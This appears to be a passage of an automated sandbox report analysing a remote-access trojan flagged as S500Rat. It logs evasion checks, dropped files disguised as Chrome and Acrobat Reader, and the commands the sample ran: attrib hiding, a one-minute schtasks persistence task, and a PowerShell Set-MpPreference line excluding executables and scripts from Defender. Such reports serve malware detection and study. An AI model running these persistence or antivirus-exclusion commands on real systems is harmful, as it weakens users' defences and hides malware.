                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected S500Rat
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe TID: 5992Thread sleep count: 500 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe TID: 3024Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe TID: 4196Thread sleep count: 33 > 30
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe TID: 4196Thread sleep time: -99000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4908Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-28023
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeThread sleep count: Count: 1533 delay: -10Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-26736
                        Source: Yara matchFile source: 00000005.00000002.634250998.00000000030A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.640455808.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.633552399.0000000003088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\UALDJT.vbs, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeWindow / User API: threadDelayed 1533Jump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeWindow / User API: foregroundWindowGot 718Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeWindow / User API: threadDelayed 500Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9459
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI coverage: 5.9 %
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI coverage: 5.5 %
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI call chain: ExitProcess graph end nodegraph_10-26737
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI call chain: ExitProcess graph end nodegraph_12-27589
                        Source: Acrobat Reader DC.exe, 0000000A.00000002.288878742.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,12_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,12_2_0044BD27
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0044BF8B
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040EBD0 LoadLibraryA,GetProcAddress,10_2_0040EBD0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,10_2_004238DA
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041A208
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00417DAA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00417DAA
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0041A208
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00417DAA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00417DAA
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00434418
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Users\user\AppData\Local\Temp\NRHRAS.exe "C:\Users\user\AppData\Local\Temp\NRHRAS.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\StubJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3 Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stub\Chrome.exe "C:\Users\user\AppData\Roaming\Stub\Chrome.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00436CD7 LogonUserW,10_2_00436CD7
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,10_2_0043333C
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00446124 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00446124
                        Source: Acrobat Reader DC.exeBinary or memory string: Shell_TrayWnd
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, 00000000.00000003.243123482.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, 00000000.00000003.240362884.0000000004300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript 